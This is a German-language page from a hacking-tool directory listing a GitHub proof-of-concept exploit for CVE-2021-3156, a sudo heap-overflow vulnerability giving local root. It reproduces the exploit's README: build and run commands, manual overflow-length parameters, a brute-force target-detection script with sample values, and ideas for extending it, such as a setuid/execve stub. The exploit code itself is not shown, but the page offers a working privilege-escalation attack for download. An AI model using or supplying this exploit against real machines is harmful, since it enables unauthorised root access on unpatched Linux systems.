Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-3156 | Kitploit
Tools/GitHubGitHub/exodusro/cve-2021-3156
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubexodusro/cve-2021-3156

CVE-2021-3156

Repository anzeigen
vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-3156 PoC

Einführung

Dies ist ein Exploit für die CVE-2021-3156-Schwachstelle in sudo (von Qualys als Baron Samedit bezeichnet).

Verwendung

build:

root@kitploit:~
$ make

Liste der Ziele:

root@kitploit:~
$ ./sudo-hax-me-a-sandwich

run:

root@kitploit:~
$ ./sudo-hax-me-a-sandwich <target_number>

manueller Modus:

root@kitploit:~
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

Brute-Force-Zielerkennung (experimentell)

Stellen Sie sicher, dass GNU parallel installiert ist.

root@kitploit:~
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>

Einige Muster zum Ausprobieren:

root@kitploit:~
$ ./brute.sh 90 120 50 70 150 300

Es verbraucht alle verfügbaren Kerne. Versuchen Sie nicht, Netflix & Brute zu machen.

Mitwirken

Tragen Sie zum Repository bei. Sende eine (sinnvolle) PR, ich kann sie mergen. Lasst einen Stern da.

Einige Ideen:

  • Weitere Ziele
  • Ziel-Lokalisierung
  • Andere Exploitation-Strategien
  • Eigenständigere Funktionalität:
    • Integriere die Shared Library hax.c (bitte verkleinern: ELF-Golf + asm setuid / execve stub)
    • Füge die mkdir-Logik zu hax.c hinzu
  • Verzeichnis-/Shared-Library-Bereinigung
Tool herunterladen